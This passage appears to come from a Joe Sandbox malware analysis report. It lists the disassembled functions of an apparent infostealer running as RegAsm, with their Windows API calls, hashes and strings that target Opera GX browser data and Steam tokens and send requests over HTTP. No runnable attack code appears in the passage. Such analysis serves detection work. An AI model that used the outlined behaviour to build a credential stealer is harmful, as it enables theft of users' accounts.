                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                  • String ID: #$Opera GX
                                                                                                                                                                                                                                                                  • API String ID: 2375657845-1046280356
                                                                                                                                                                                                                                                                  • Opcode ID: 798790b5dc80bdfdda5aa876c595e700c34336fa41a7e3219b82f0ed77b5d130
                                                                                                                                                                                                                                                                  • Instruction ID: 97fd66e00df18fc473bc88577cccc9dc0cc64bc8c1c06344a2cf2219c032d5d4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 798790b5dc80bdfdda5aa876c595e700c34336fa41a7e3219b82f0ed77b5d130
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33025E7190424CEADF14EBE5D946ADEBBB8AF15308F14417EE405736C2EA781B0CCB66
                                                                                                                                                                                                                                                                  Function 0041331B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413320
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041333D
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413401
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrlen
                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                  • API String ID: 2133942097-2861137601
                                                                                                                                                                                                                                                                  • Opcode ID: cf1804ca1d5caf611580d776909af1f1bd4b129213c4fecfa10097f9f07de89c
                                                                                                                                                                                                                                                                  • Instruction ID: b4cc01ef7bd13145f2c05274e32235355c0f4b2aed9e57073c08847262a746c9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf1804ca1d5caf611580d776909af1f1bd4b129213c4fecfa10097f9f07de89c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD3156B1D00148AFDB10EFA9D846BDD7BB4AF15354F10807EF505A7291DB389648CBA5
                                                                                                                                                                                                                                                                  Function 00413020 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413025
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: _EH_prolog.MSVCRT ref: 00404F6D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FD0
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: StrCmpCA.SHLWAPI(?), ref: 00404FE4
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405007
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 0040503D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405061
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040506C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040508A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413083
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                  • API String ID: 1120091252-2579291623
                                                                                                                                                                                                                                                                  • Opcode ID: 489aeafad04ac873492353aae8cda6a1cb00072d1437c571069bb1d8be625cd0
                                                                                                                                                                                                                                                                  • Instruction ID: 24acd2216f046d8be3e132ca6569cd53f6e290b8bf52afe2fbe94054b149a15e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 489aeafad04ac873492353aae8cda6a1cb00072d1437c571069bb1d8be625cd0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA213DB4900149EEDB10EBA5C556BDD7BB4AF15308F2080BEE805736C2DB785B4CCB66
                                                                                                                                                                                                                                                                  Function 00410FE7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,*JA), ref: 00410FFF
                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041101A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411021
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                  • String ID: *JA
                                                                                                                                                                                                                                                                  • API String ID: 3183270410-3252079789
                                                                                                                                                                                                                                                                  • Opcode ID: 47ef1980535b637ed4dfbd0625126b653419e5c479f82fec4f671c2582b054d8
                                                                                                                                                                                                                                                                  • Instruction ID: 4557b9e11eac00421c1fe9bbcaa01f21c70e6581b375fa9363ee3146dc092c6b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47ef1980535b637ed4dfbd0625126b653419e5c479f82fec4f671c2582b054d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55F0E579901228BBDB20AB50CC09FDD3B78EF0A715F000060FB84AB1D0CBB4AAC48B94
                                                                                                                                                                                                                                                                  Function 00414519 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00413455: _EH_prolog.MSVCRT ref: 0041345A
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004145A2
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2678630583-0
                                                                                                                                                                                                                                                                  • Opcode ID: 21017c445fbbbf99b5bda052ac6b6845194a5c5231e2748d89e37717d047a35e
                                                                                                                                                                                                                                                                  • Instruction ID: 62e3c5de436c31279125146f6898116362dae1543b62e9666d420791640f84c9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21017c445fbbbf99b5bda052ac6b6845194a5c5231e2748d89e37717d047a35e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33315C75A01158EFCB11DFE4C985ADEBBB8BF19304F50406BF906A7281DB789B48CB54
                                                                                                                                                                                                                                                                  Function 0040FE5F Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4), ref: 0040FE73
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4,00000000,?), ref: 0040FE7A
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE98
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FEB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9c49e4bc5763ad4850af08873979d77f6a9921c9032cad3f6d1d02449519d482
                                                                                                                                                                                                                                                                  • Instruction ID: dad440606e4edf0a1e1e8460a984b7ff4329a715c3c2c5110655c0acc9f42295
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c49e4bc5763ad4850af08873979d77f6a9921c9032cad3f6d1d02449519d482
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0547A240248FFEB105BD1DD0EF9A7A7EEB46B00F101025FB01E91A0DBB159849B60
                                                                                                                                                                                                                                                                  Function 00402330 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ^%@$^%@
                                                                                                                                                                                                                                                                  • API String ID: 0-910765052
                                                                                                                                                                                                                                                                  • Opcode ID: e68f0b5b1e6d13781cc30a7435e007b657b5a8620a47c4ab08c57cdd3d737519
                                                                                                                                                                                                                                                                  • Instruction ID: 26dc63eb9ce11a25a12add1a48e2b40ffc468f06084f3509c1eb81c183aeb80b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e68f0b5b1e6d13781cc30a7435e007b657b5a8620a47c4ab08c57cdd3d737519
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F94139715002299FCB01CF69D8806DD77B5FF89318F1484BADC55E7391C7B86982CB94
                                                                                                                                                                                                                                                                  Function 0041461A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041461F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265A3), ref: 00414670
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Soft\Steam\steam_tokens.txt, xrefs: 00414688
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                                  • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                  • API String ID: 40794102-3507145866
                                                                                                                                                                                                                                                                  • Opcode ID: ff45fa44cfa1e4fdb43f277490c15af90d458476ae0314ca906f4c666bf54dd7
                                                                                                                                                                                                                                                                  • Instruction ID: 7240e2f4b6b6f9ef8787d3a9792356a2d8f4ce3c4f9df371fa985cbdc73882ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff45fa44cfa1e4fdb43f277490c15af90d458476ae0314ca906f4c666bf54dd7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB214471900248AACF14EBA5C956BDDBB78AF19318F10817EE406725D2DB7C1B48CA66
                                                                                                                                                                                                                                                                  Function 00407219 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040721E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407455
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407469
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
